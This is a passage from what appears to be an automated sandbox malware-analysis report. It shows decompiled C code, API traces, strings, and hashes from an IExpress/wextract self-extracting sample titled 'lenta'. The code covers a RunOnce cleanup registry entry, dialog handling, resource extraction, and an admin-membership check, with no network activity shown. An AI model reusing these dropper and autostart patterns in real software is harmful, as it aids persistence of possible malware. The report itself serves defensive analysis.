                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 009722A3
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 009722D8
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 009722F5
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00972305
                                                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0097236E
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0097237A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • wextract_cleanup0, xrefs: 0097227C, 009722CD, 00972363
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00972321
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00972299
                                                                                                                                                                                                                                              • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0097232D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                              • API String ID: 3027380567-2036266374
                                                                                                                                                                                                                                              • Opcode ID: 239607ffddea1a09f450664c3ef46da21e956136d93d28f6a863e80736a0868c
                                                                                                                                                                                                                                              • Instruction ID: 1c6af2d50b4e22acaa2f708c3dcb5a71b0977029fa669a7baec53436483da930
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 239607ffddea1a09f450664c3ef46da21e956136d93d28f6a863e80736a0868c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7031D773A142186BDB219B60DC49FEF7B7CEF95704F0041E9B54DA6051EA70AF88CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                                              			E00973100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                                                                                                              				struct HWND__* _t33;
                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                                                                              					if( *0x978590 == 0) {
                                                                                                                                                                                                                                              						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                              						 *0x978590 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t8 - 1;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					L8:
                                                                                                                                                                                                                                              					EndDialog(_a4, ??);
                                                                                                                                                                                                                                              					L9:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                              				if(_t15 == 0) {
                                                                                                                                                                                                                                              					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t33 = _a4;
                                                                                                                                                                                                                                              					E009743D0(_t33, _t16);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t33, 0x834,  *0x978d4c);
                                                                                                                                                                                                                                              					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                              					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                              					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                              					 *0x9788b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                              					SetWindowLongA(_t34, 0xfffffffc, E009730C0);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t15 != 1) {
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_a12 != 6) {
                                                                                                                                                                                                                                              					if(_a12 != 7) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				goto L8;
                                                                                                                                                                                                                                              			}










                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 0097313B
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0097314B
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000834), ref: 0097316A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00973176
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0097317D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000834), ref: 00973185
                                                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000FC), ref: 00973190
                                                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000FC,009730C0), ref: 009731A3
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 009731CA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
• Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                              • Opcode ID: 95ec171c8dd0a715e011b4d9f6b896f92ef1687aa029e60e190ced7ce2b5da34
                                                                                                                                                                                                                                              • Instruction ID: f76d428d2c614969c07188d98b6c1b8fd72dc474300fc5625c2535b8ab6fc1a2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95ec171c8dd0a715e011b4d9f6b896f92ef1687aa029e60e190ced7ce2b5da34
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B11723326C211BBEB115B249C0CB9E3B68FB86721F50C610F82D951E1DB759681F756
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E0097468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				CHAR* _t14;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				long _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 = __ecx;
                                                                                                                                                                                                                                              				_t11 = __edx;
                                                                                                                                                                                                                                              				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                              				_t16 = _t4;
                                                                                                                                                                                                                                              				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                              					if(_t16 == 0) {
                                                                                                                                                                                                                                              						L5:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                              					FreeResource(_t15);
                                                                                                                                                                                                                                              					return _t16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                              • memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: TITLE$lenta
                                                                                                                                                                                                                                              • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                              • Opcode ID: 4798ad14af2870bdc8a9074bb17bdd7dd55acac16314ac8437ccf5c68735a7b3
                                                                                                                                                                                                                                              • Instruction ID: 33945f80672c638802ce50062f8e5d6a20c4c5807ecd67751441d7e2364bda1d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4798ad14af2870bdc8a9074bb17bdd7dd55acac16314ac8437ccf5c68735a7b3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE0136376582107BE31027A55C4DF7F7E2CEBC7F52F044414FA4D96191DA61888196A6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                                                                              			E009717EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				short _v12;
                                                                                                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                                                                              				intOrPtr* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				void* _t35;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                              				_v12 = 0x500;
                                                                                                                                                                                                                                              				_t37 = __ecx;
                                                                                                                                                                                                                                              				_v16.Value = 0;
                                                                                                                                                                                                                                              				_v28 = __ecx;
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                              					_v20 = _t20;
                                                                                                                                                                                                                                              					if(_t20 != 0) {
                                                                                                                                                                                                                                              						 *_t37 = 0;
                                                                                                                                                                                                                                              						_t28 = 1;
                                                                                                                                                                                                                                              						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                              							_t37 = _t39;
                                                                                                                                                                                                                                              							 *0x97a288(0, _v24, _v28);
                                                                                                                                                                                                                                              							_v20();
                                                                                                                                                                                                                                              							if(_t39 != _t39) {
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							FreeSid(_v24);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					FreeLibrary(_t36);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009718DD), ref: 0097181A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0097182C
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(009718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009718DD), ref: 00971855
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?,?,?,?,009718DD), ref: 00971883
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,009718DD), ref: 0097188A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                              • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                              • Opcode ID: 1e0ec0ccbe6c0065061b0f2455a4290b9f90e66b0e32c5842dd97aaf375f8eb3
                                                                                                                                                                                                                                              • Instruction ID: 605d52d54812055516a812122f031372cb2b554edf249f7b0872d186abadfca7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e0ec0ccbe6c0065061b0f2455a4290b9f90e66b0e32c5842dd97aaf375f8eb3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B11BC32E14205AFDB109FA4DC49ABEB778EF85701F104569F919E3290DB309D409795
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00973450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                                                                                                              				int _t22;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                                                                                                              					EndDialog(_a4, 2);
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t24 = _a4;
                                                                                                                                                                                                                                              					E009743D0(_t24, _t12);
                                                                                                                                                                                                                                              					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t24, 0x838,  *0x979404);
                                                                                                                                                                                                                                              					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t11 == 1) {
                                                                                                                                                                                                                                              					_t22 = _a12;
                                                                                                                                                                                                                                              					if(_t22 < 6) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 <= 7) {
                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                              						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 != 0x839) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x9791dc = 1;
                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00973490
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0097349A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 009734B2
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000838), ref: 009734C4
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 009734CB
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000002), ref: 009734D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                              • Opcode ID: f36f8809f9958a16c77e389851d6c0d2d3fc8ec111e5ba4b017706ff5257551d
                                                                                                                                                                                                                                              • Instruction ID: d13de7f05415176bbe8b0fa550c20fd4dcaef010015eb644fa86e7f9b3cd417a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f36f8809f9958a16c77e389851d6c0d2d3fc8ec111e5ba4b017706ff5257551d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19019E33268114ABD71E5F69DC0C96D3B68FB85B01F50C420FA4E869B0CB359B91FB85
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E00972AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				char _t32;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				char* _t38;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				intOrPtr* _t55;
                                                                                                                                                                                                                                              				CHAR* _t59;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t60 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_t65 = _a4;
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t64 = __ecx;
                                                                                                                                                                                                                                              				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                              					GetModuleFileNameA( *0x979a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_t17 =  *_t64;
                                                                                                                                                                                                                                              						if(_t17 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                              						 *_t65 =  *_t64;
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t65[1] = _t64[1];
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                              							L19:
                                                                                                                                                                                                                                              							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                              								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                              									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                              										goto L19;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00971680(_t65, E009717C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              									_t52 = _t65;
                                                                                                                                                                                                                                              									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                              									_t60 = _t14;
                                                                                                                                                                                                                                              									do {
                                                                                                                                                                                                                                              										_t32 =  *_t52;
                                                                                                                                                                                                                                              										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                              									} while (_t32 != 0);
                                                                                                                                                                                                                                              									goto L17;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								E009765E8( &_v268);
                                                                                                                                                                                                                                              								_t55 =  &_v268;
                                                                                                                                                                                                                                              								_t62 = _t55 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t34 =  *_t55;
                                                                                                                                                                                                                                              									_t55 = _t55 + 1;
                                                                                                                                                                                                                                              								} while (_t34 != 0);
                                                                                                                                                                                                                                              								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                              								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                              									 *_t38 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								E00971680(_t65, E009717C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              								_t59 = _t65;
                                                                                                                                                                                                                                              								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                              								_t60 = _t12;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t42 =  *_t59;
                                                                                                                                                                                                                                              									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                              								} while (_t42 != 0);
                                                                                                                                                                                                                                              								L17:
                                                                                                                                                                                                                                              								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *_t65 = _t17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                              			}






















                                                                                                                                                                                                                                              0x00972b99
                                                                                                                                                                                                                                              0x00972bc8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972b9b
                                                                                                                                                                                                                                              0x00972bae
                                                                                                                                                                                                                                              0x00972bb3
                                                                                                                                                                                                                                              0x00972bb5
                                                                                                                                                                                                                                              0x00972bb5
                                                                                                                                                                                                                                              0x00972bb8
                                                                                                                                                                                                                                              0x00972bb8
                                                                                                                                                                                                                                              0x00972bba
                                                                                                                                                                                                                                              0x00972bbb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972bb8
                                                                                                                                                                                                                                              0x00972b28
                                                                                                                                                                                                                                              0x00972b2e
                                                                                                                                                                                                                                              0x00972b33
                                                                                                                                                                                                                                              0x00972b39
                                                                                                                                                                                                                                              0x00972b3c
                                                                                                                                                                                                                                              0x00972b3c
                                                                                                                                                                                                                                              0x00972b3e
                                                                                                                                                                                                                                              0x00972b3f
                                                                                                                                                                                                                                              0x00972b55
                                                                                                                                                                                                                                              0x00972b5d
                                                                                                                                                                                                                                              0x00972b64
                                                                                                                                                                                                                                              0x00972b64
                                                                                                                                                                                                                                              0x00972b7a
                                                                                                                                                                                                                                              0x00972b7f
                                                                                                                                                                                                                                              0x00972b81
                                                                                                                                                                                                                                              0x00972b81
                                                                                                                                                                                                                                              0x00972b84
                                                                                                                                                                                                                                              0x00972b84
                                                                                                                                                                                                                                              0x00972b86
                                                                                                                                                                                                                                              0x00972b87
                                                                                                                                                                                                                                              0x00972bbf
                                                                                                                                                                                                                                              0x00972bc1
                                                                                                                                                                                                                                              0x00972bc1
                                                                                                                                                                                                                                              0x00972b26
                                                                                                                                                                                                                                              0x00972bda
                                                                                                                                                                                                                                              0x00972bda
                                                                                                                                                                                                                                              0x00972be6
                                                                                                                                                                                                                                              0x00972be6
                                                                                                                                                                                                                                              0x00972bf8

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00972AE6
                                                                                                                                                                                                                                              • IsDBCSLeadByte.KERNEL32(00000000), ref: 00972AF2
                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 00972B12
                                                                                                                                                                                                                                              • CharUpperA.USER32 ref: 00972B1E
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?), ref: 00972B55
